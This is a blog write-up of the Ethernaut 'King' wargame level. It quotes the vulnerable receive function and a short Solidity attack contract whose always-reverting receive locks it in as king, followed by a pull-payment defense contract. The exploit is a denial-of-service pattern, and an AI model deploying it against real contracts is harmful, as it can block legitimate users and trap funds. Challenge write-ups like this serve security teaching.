# Smart Contract Hacking Ethernaut: 9. King

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-26
**URL:** https://paragraph.com/@leekdev/ethernaut-9-king

## Content

Ethernaut is a wargame developed by OpenZeppelin around the Solidity programming language. Every level has a smart contract that needs to be hacked.

### Tutorial

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - ….

### Challenge

Find a way to become the owner in the King contract, and also prevent anyone else from becoming King.

### Hack approach

The key is the logic in the `receive` function:

```solidity
receive() external payable {
    // The sender must pay at least the current prize (or be the owner)
    require(msg.value >= prize || msg.sender == owner);
    // If someone else pays more than the current king did, the current king is paid back and a new king is set.
    // Because ether has to be sent back, the payment can be intercepted in the recipient's receive function.
    payable(king).transfer(msg.value);
    king = msg.sender;
    prize = msg.value;
}
```

### Attack contract

```solidity
contract KingHack {
    // Deploy with ether attached: the constructor forwards it to the target so that this contract becomes king
    constructor(address _target) payable {
        (bool success,) = payable(address(_target)).call{ value: msg.value }("");
        require(success, "External call failed");
    }

    // Every incoming payment reverts, so the transfer to this contract in the target's receive always fails
    receive() external payable {
        require(false, "I am King forever!");
    }
}
```

### Hack cases

### Defense approach

….

### References

….
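On the defense side, the usual fix for the `receive` logic shown above is to stop pushing ether to the old king and let them pull it instead. The contract below is an added example, not code from the original post or from the Ethernaut level; `KingPull`, `pendingWithdrawals`, `withdraw` and the constructor are assumed names and details, while `king`, `prize` and `owner` follow the snippet above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: pull-payment variant of the King logic.
// KingPull, pendingWithdrawals and withdraw() are hypothetical names.
contract KingPull {
    address public king;
    uint256 public prize;
    address public owner;

    // Ether owed to dethroned kings, claimed by the recipient (pull)
    // instead of being sent during the takeover (push).
    mapping(address => uint256) public pendingWithdrawals;

    // Assumed setup: the deployer is the owner and the first king.
    constructor() payable {
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    }

    receive() external payable {
        require(msg.value >= prize || msg.sender == owner, "bid too low");
        // Record the debt only. No external call is made here, so a
        // reverting receive() in the old king cannot block the takeover.
        pendingWithdrawals[king] += msg.value;
        king = msg.sender;
        prize = msg.value;
    }

    function withdraw() external {
        uint256 amount = pendingWithdrawals[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // Effects before interaction: zero the balance before sending,
        // so a reentrant call finds nothing left to claim.
        pendingWithdrawals[msg.sender] = 0;
        (bool ok, ) = payable(msg.sender).call{value: amount}("");
        // A failure here reverts only the caller's own withdrawal.
        require(ok, "withdraw failed");
    }
}
```

With this layout a contract such as `KingHack` can still become king, but its reverting `receive` only stops it from collecting its own payout; the next sender still takes the throne.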